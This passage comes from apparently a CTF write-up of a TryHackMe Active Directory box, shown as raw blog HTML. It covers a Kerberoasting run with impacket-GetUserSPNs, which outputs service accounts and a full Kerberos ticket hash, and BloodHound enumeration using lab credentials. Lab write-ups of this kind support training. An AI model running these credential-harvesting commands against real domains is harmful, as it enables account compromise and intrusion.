stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset\/LDAP]\n\u2514\u2500$ impacket-GetUserSPNs thm.corp\/AUTOMATE:Passw0rd1 -dc-ip 10.10.52.38 -request\nImpacket v0.11.0 - Copyright 2023 Fortra\n\nServicePrincipalName  Name               MemberOf                                                      PasswordLastSet             LastLogon                   Delegation  \n--------------------  -----------------  ------------------------------------------------------------  --------------------------  --------------------------  -----------\nCIFS\/BDEWVIR1000000   MARCELINO_BALLARD  CN=AN-173-distlist1,OU=GOO,OU=People,DC=thm,DC=corp           2023-06-12 11:05:55.645235  &lt;never&gt;                                 \nCIFS\/HAYSTACK         3811465497SA       CN=Remote Management Users,CN=Builtin,DC=thm,DC=corp          2023-06-12 11:05:58.082696  &lt;never&gt;                                 \nMSSQL\/BDEWVIR1000000  MARION_CLAY        CN=Protected Users,CN=Users,DC=thm,DC=corp                    2023-06-12 11:05:58.379575  &lt;never&gt;                                 \nftp\/HAYSTACK          MARION_CLAY        CN=Protected Users,CN=Users,DC=thm,DC=corp                    2023-06-12 11:05:58.379575  &lt;never&gt;                                 \nhttps\/HAYSTACK        FANNY_ALLISON      CN=CH-ecu-distlist1,OU=Groups,OU=OGC,OU=Stage,DC=thm,DC=corp  2023-06-12 11:05:55.067142  &lt;never&gt;                                 \nkafka\/HAYSTACK        FANNY_ALLISON      CN=CH-ecu-distlist1,OU=Groups,OU=OGC,OU=Stage,DC=thm,DC=corp  2023-06-12 11:05:55.067142  &lt;never&gt;                                 \nkafka\/BDEWVIR1000000  CYRUS_WHITEHEAD    CN=CH-ecu-distlist1,OU=Groups,OU=OGC,OU=Stage,DC=thm,DC=corp  2023-06-12 11:05:54.332753  &lt;never&gt;                                 \nMSSQL\/HAYSTACK        TRACY_CARVER       CN=CH-ecu-distlist1,OU=Groups,OU=OGC,OU=Stage,DC=thm,DC=corp  2023-06-12 11:05:53.879633  &lt;never&gt;                                 \nPOP3\/BDEWVIR1000000   DEANNE_WASHINGTON  CN=CH-ecu-distlist1,OU=Groups,OU=OGC,OU=Stage,DC=thm,DC=corp  2023-06-12 11:05:54.488998  &lt;never&gt;                                 \nPOP3\/HAYSTACK         DARLA_WINTERS      CN=Domain Computers,CN=Users,DC=thm,DC=corp                   2023-07-18 11:21:44.443061  2023-07-18 11:28:56.952295  constrained \n\n..&lt;SNIPPED&gt;..\n\n$krb5tgs$23$*DARLA_WINTERS$THM.CORP$thm.corp\/DARLA_WINTERS*$07e8a7acc86e305030c0481913777d9d$25ecd65754d601ed4274a4d38724dc515293936a2cc47f73ba95af1615815e03e0d9bddcba10447528f5cfaaa2d8cca693a052911fae08b65a51064a4329d564967d7adbb5671ad56add7ee4391c34bf38d1c71bbab1937594b8082fdf153b00a188a488d8963d6272635938dd32644721b4873b59ecce1f16c69ffd78c7d08195109b0965055bd8125e6d2ee5abd0d9ebcc0cad64ce95b88d2e5e5219ac0891c27c5d82fa72920f1cc9ad0d1ed9e53a1d6054216339d9fe09f15ae7d0f67c22fd050e727f49bb747d46e131636dd5602928cd8fe2c01baa81286bfee80f7bcb522efd417b3a3ac06a7714fc24ff87a6ab4b34daa6d7cce6f72f212cba3bc02214b8cee12e656c40b5b68a11699ecb65b3e6541497549fea71a3cb622d6274207bcf7da97f91a6640f5fddea7229287a4578453c61d16fcbd42e57897a7c1c2a5ada51be65d13ba876eb836117c8453baac83f3a07d282d0f566e8503d42649078f8da8decbf69e8dceec565a8a5769a2b4f18bbd1fcf5646f54b40936a2979ad614278ce68f2d867ec4ae60fe7122e1188926da9214d60f4f428be3a9a6b992ed87e29551df8bb2a1504438e1cba80cc3fd092967f3333e72356aceae5d4ba15423c51b0a25c98acc093c1ebb112d39515f119e25b7d981e2f93cadb71c40529f5baddf3d3fffc0cb116a175358dc10d9250bec5778c127b1d39f81e8e6401d9e68a8f259240e3fa82fc6e68f1deb8f0a75767282c1e2d5605e3542be1f6173cead327a513d3ca1a593cd3e8eb013d7150bbfe1a5a719e33eb0c6f8eaa118fb74a9e42e3c26818ec6c32c0efb465725fa2df921b6ac898ebf25c61245f4756efa38faee05159cd71f4578207404d8351d8b702b7c992e7011cf9e58319513da489fa2f7f74b5624cf3ec18b0723928a412f06c29d9cbf9489af5bf965978f2bc7b76c498f00f385b4af7862015a7a2f0808c4b42bb495a971f80c9efbdf42286d4c3492914c644c3a59ee679de3ba8d2e1f538e220f9ed22ec1c470ff12abe7d9869c3823eefefbc785f1bca39e325f534fe91c8df9f6c53b91598ef7a2e83536968326cbb65311e349678212ec4c327ae86cce6f481399d23e8d169d03f494b8197a3a5d2a5b71bc69146ccc2d183fa00e7b73e84f28a9e98a31a689598fc080165794cfa683ea3efd2cdb2859178a24e14d589456beae2826b722fc6758d62e0d8dd0167e0973c0ed33d32d277e468db4920d0ebb0e82d1e31639322f8317512713fea56de6e1aa3ad91ddd65dd6c12d36debac9fa3bfb9047ba03408cb4c86947e0b34a1f9ea964048db17db38a5dad79a8bad319a8a87f2149a65c4c9298e1b164ed6142986ba49e4e0b892595192561b410c0bccac2163a4c45704adcf8a14dae69a15fb0172c9a935c404622f180bca50c21dcb471c3a9c030e28b2a877\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset\/LDAP<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">impacket-GetUserSPNs<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">thm.corp\/AUTOMATE:Passw0rd1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-dc-ip<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.52.38<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-request<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Impacket<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v0.11.0<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Copyright<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Fortra<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">ServicePrincipalName<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Name<\/span><span style=\"color: #BABED8\">               <\/span><span style=\"color: #C3E88D\">MemberOf<\/span><span style=\"color: #BABED8\">                                                      <\/span><span style=\"color: #C3E88D\">PasswordLastSet<\/span><span style=\"color: #BABED8\">             <\/span><span style=\"color: #C3E88D\">LastLogon<\/span><span style=\"color: #BABED8\">                   <\/span><span style=\"color: #C3E88D\">Delegation<\/span><span style=\"color: #BABED8\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">--------------------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">-----------------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">------------------------------------------------------------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">--------------------------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">--------------------------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">-----------<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">CIFS\/BDEWVIR1000000<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">MARCELINO_BALLARD<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">CN=AN-173-distlist1,OU=GOO,OU=People,DC=thm,DC=corp<\/span><span style=\"color: #BABED8\">           <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-06-12<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">11<\/span><span style=\"color: #C3E88D\">:05:55.645235<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #C3E88D\">neve<\/span><span style=\"color: #BABED8\">r<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">                                 <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">CIFS\/HAYSTACK<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #F78C6C\">3811465497<\/span><span style=\"color: #C3E88D\">SA<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">CN=Remote<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Management<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Users,CN=Builtin,DC=thm,DC=corp<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-06-12<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">11<\/span><span style=\"color: #C3E88D\">:05:58.082696<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #C3E88D\">neve<\/span><span style=\"color: #BABED8\">r<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">                                 <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">MSSQL\/BDEWVIR1000000<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">MARION_CLAY<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #C3E88D\">CN=Protected<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Users,CN=Users,DC=thm,DC=corp<\/span><span style=\"color: #BABED8\">                    <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-06-12<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">11<\/span><span style=\"color: #C3E88D\">:05:58.379575<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #C3E88D\">neve<\/span><span style=\"color: #BABED8\">r<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">                                 <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">ftp\/HAYSTACK<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">MARION_CLAY<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #C3E88D\">CN=Protected<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Users,CN=Users,DC=thm,DC=corp<\/span><span style=\"color: #BABED8\">                    <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-06-12<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">11<\/span><span style=\"color: #C3E88D\">:05:58.379575<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #C3E88D\">neve<\/span><span style=\"color: #BABED8\">r<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">                                 <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">https\/HAYSTACK<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #C3E88D\">FANNY_ALLISON<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">CN=CH-ecu-distlist1,OU=Groups,OU=OGC,OU=Stage,DC=thm,DC=corp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-06-12<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">11<\/span><span style=\"color: #C3E88D\">:05:55.067142<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #C3E88D\">neve<\/span><span style=\"color: #BABED8\">r<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">                                 <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">kafka\/HAYSTACK<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #C3E88D\">FANNY_ALLISON<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">CN=CH-ecu-distlist1,OU=Groups,OU=OGC,OU=Stage,DC=thm,DC=corp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-06-12<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">11<\/span><span style=\"color: #C3E88D\">:05:55.067142<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #C3E88D\">neve<\/span><span style=\"color: #BABED8\">r<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">                                 <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">kafka\/BDEWVIR1000000<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">CYRUS_WHITEHEAD<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">CN=CH-ecu-distlist1,OU=Groups,OU=OGC,OU=Stage,DC=thm,DC=corp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-06-12<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">11<\/span><span style=\"color: #C3E88D\">:05:54.332753<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #C3E88D\">neve<\/span><span style=\"color: #BABED8\">r<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">                                 <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">MSSQL\/HAYSTACK<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #C3E88D\">TRACY_CARVER<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">CN=CH-ecu-distlist1,OU=Groups,OU=OGC,OU=Stage,DC=thm,DC=corp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-06-12<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">11<\/span><span style=\"color: #C3E88D\">:05:53.879633<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #C3E88D\">neve<\/span><span style=\"color: #BABED8\">r<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">                                 <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">POP3\/BDEWVIR1000000<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">DEANNE_WASHINGTON<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">CN=CH-ecu-distlist1,OU=Groups,OU=OGC,OU=Stage,DC=thm,DC=corp<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-06-12<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">11<\/span><span style=\"color: #C3E88D\">:05:54.488998<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #C3E88D\">neve<\/span><span style=\"color: #BABED8\">r<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">                                 <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">POP3\/HAYSTACK<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">DARLA_WINTERS<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">CN=Domain<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Computers,CN=Users,DC=thm,DC=corp<\/span><span style=\"color: #BABED8\">                   <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-07-18<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">11<\/span><span style=\"color: #C3E88D\">:21:44.443061<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-07-18<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">11<\/span><span style=\"color: #C3E88D\">:28:56.952295<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">constrained<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #82AAFF\">..<\/span><span style=\"color: #BABED8\">&lt;SNIPPED&gt;<\/span><span style=\"color: #82AAFF\">..<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">$krb5tgs$23$<\/span><span style=\"color: #89DDFF\">*<\/span><span style=\"color: #BABED8\">DARLA_WINTERS$THM.CORP$thm.corp\/DARLA_WINTERS<\/span><span style=\"color: #89DDFF\">*<\/span><span style=\"color: #BABED8\">$07e8a7acc86e305030c0481913777d9d$25ecd65754d601ed4274a4d38724dc515293936a2cc47f73ba95af1615815e03e0d9bddcba10447528f5cfaaa2d8cca693a052911fae08b65a51064a4329d564967d7adbb5671ad56add7ee4391c34bf38d1c71bbab1937594b8082fdf153b00a188a488d8963d6272635938dd32644721b4873b59ecce1f16c69ffd78c7d08195109b0965055bd8125e6d2ee5abd0d9ebcc0cad64ce95b88d2e5e5219ac0891c27c5d82fa72920f1cc9ad0d1ed9e53a1d6054216339d9fe09f15ae7d0f67c22fd050e727f49bb747d46e131636dd5602928cd8fe2c01baa81286bfee80f7bcb522efd417b3a3ac06a7714fc24ff87a6ab4b34daa6d7cce6f72f212cba3bc02214b8cee12e656c40b5b68a11699ecb65b3e6541497549fea71a3cb622d6274207bcf7da97f91a6640f5fddea7229287a4578453c61d16fcbd42e57897a7c1c2a5ada51be65d13ba876eb836117c8453baac83f3a07d282d0f566e8503d42649078f8da8decbf69e8dceec565a8a5769a2b4f18bbd1fcf5646f54b40936a2979ad614278ce68f2d867ec4ae60fe7122e1188926da9214d60f4f428be3a9a6b992ed87e29551df8bb2a1504438e1cba80cc3fd092967f3333e72356aceae5d4ba15423c51b0a25c98acc093c1ebb112d39515f119e25b7d981e2f93cadb71c40529f5baddf3d3fffc0cb116a175358dc10d9250bec5778c127b1d39f81e8e6401d9e68a8f259240e3fa82fc6e68f1deb8f0a75767282c1e2d5605e3542be1f6173cead327a513d3ca1a593cd3e8eb013d7150bbfe1a5a719e33eb0c6f8eaa118fb74a9e42e3c26818ec6c32c0efb465725fa2df921b6ac898ebf25c61245f4756efa38faee05159cd71f4578207404d8351d8b702b7c992e7011cf9e58319513da489fa2f7f74b5624cf3ec18b0723928a412f06c29d9cbf9489af5bf965978f2bc7b76c498f00f385b4af7862015a7a2f0808c4b42bb495a971f80c9efbdf42286d4c3492914c644c3a59ee679de3ba8d2e1f538e220f9ed22ec1c470ff12abe7d9869c3823eefefbc785f1bca39e325f534fe91c8df9f6c53b91598ef7a2e83536968326cbb65311e349678212ec4c327ae86cce6f481399d23e8d169d03f494b8197a3a5d2a5b71bc69146ccc2d183fa00e7b73e84f28a9e98a31a689598fc080165794cfa683ea3efd2cdb2859178a24e14d589456beae2826b722fc6758d62e0d8dd0167e0973c0ed33d32d277e468db4920d0ebb0e82d1e31639322f8317512713fea56de6e1aa3ad91ddd65dd6c12d36debac9fa3bfb9047ba03408cb4c86947e0b34a1f9ea964048db17db38a5dad79a8bad319a8a87f2149a65c4c9298e1b164ed6142986ba49e4e0b892595192561b410c0bccac2163a4c45704adcf8a14dae69a15fb0172c9a935c404622f180bca50c21dcb471c3a9c030e28b2a877<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>We found more hashes for users but we will keep this aside for now. I tried cracking a couple of hashes but was unsuccessful.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:26px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Enumerating Domain with BloodHound<\/mark><\/h3>\n\n\n\n<p>We can use TABITHA_BRITT&#8217;s credentials to run BloodHound. Once we gather all the files, we will upload it to the BloodHound tool and start analyzing them.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset\/BloodHound]\n\u2514\u2500$ bloodhound-python -d thm.corp -u TABATHA_BRITT -p marxxxxxxxxx)' -ns 10.10.52.38 -c all\nINFO: Found AD domain: thm.corp\nINFO: Getting TGT for user\nINFO: Connecting to LDAP server: haystack.thm.corp\nINFO: Found 1 domains\nINFO: Found 1 domains in the forest\nINFO: Found 1 computers\nINFO: Connecting to LDAP server: haystack.thm.corp\nINFO: Found 42 users\nINFO: Found 55 groups\nINFO: Found 3 gpos\nINFO: Found 222 ous\nINFO: Found 19 containers\nINFO: Found 0 trusts\nINFO: Starting computer enumeration with 10 workers\nINFO: Querying computer: HayStack.thm.corp\nINFO: Done in 01M 44S\n                                                                                                             \n\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset\/BloodHound]\n\u2514\u2500$ ls\n20240128185605_computers.json   20240128185605_gpos.json    20240128185605_users.json\n20240128185605_containers.json  20240128185605_groups.json\n20240128185605_domains.json     20240128185605_ous.json\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset\/BloodHound<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">bloodhound-python<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-d<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">thm.corp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-u<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">TABATHA_BRITT<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-p<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">marxxxxxxxxx<\/span><span style=\"color: #BABED8\">)<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\"> -ns 10.10.52.38 -c all<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">INFO: Found AD domain: thm.corp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">INFO: Getting TGT for user<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">INFO: Connecting to LDAP server: haystack.thm.corp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">INFO: Found 1 domains<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">INFO: Found 1 domains in the forest<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">INFO: Found 1 computers<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">INFO: Connecting to LDAP server: haystack.thm.corp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">INFO: Found 42 users<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">INFO: Found 55 groups<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">INFO: Found 3 gpos<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">INFO: Found 222 ous<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">INFO: Found 19 containers<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">INFO: Found 0 trusts<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">INFO: Starting computer enumeration with 10 workers<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">INFO: Querying computer: HayStack.thm.corp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">INFO: Done in 01M 44S<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">                                                                                                             <\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset\/BloodHound]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">\u2514\u2500$ ls<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">20240128185605_computers.json   20240128185605_gpos.json    20240128185605_users.json<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">20240128185605_containers.json  20240128185605_groups.json<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">20240128185605_domains.json     20240128185605_ous.json<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09f74ec9&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09f74ec9\" 